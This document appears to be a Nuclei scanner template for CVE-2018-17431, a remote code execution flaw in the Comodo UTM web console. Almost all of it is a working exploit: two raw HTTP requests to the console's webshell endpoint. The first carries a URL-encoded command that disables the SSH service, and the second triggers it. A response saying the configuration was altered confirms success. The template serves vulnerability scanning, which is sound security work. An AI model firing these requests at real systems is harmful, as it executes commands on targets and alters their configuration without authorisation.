id: CVE-2018-17431 info: name: Comodo Unified Threat Management Web Console 2.7.0 - RCE author: dwisiswant0 severity: critical description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 Remote Code Execution (Web Shell based) tags: cve,cve2018,comodo,rce reference: - https://www.exploit-db.com/exploits/48825 - https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276 requests: - raw: - | GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1 Host: {{Hostname}} Connection: close - | # to triggering RCE GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1 Host: {{Hostname}} Connection: close matchers-condition: and matchers: - type: word words: - "Configuration has been altered" part: body - type: status status: - 200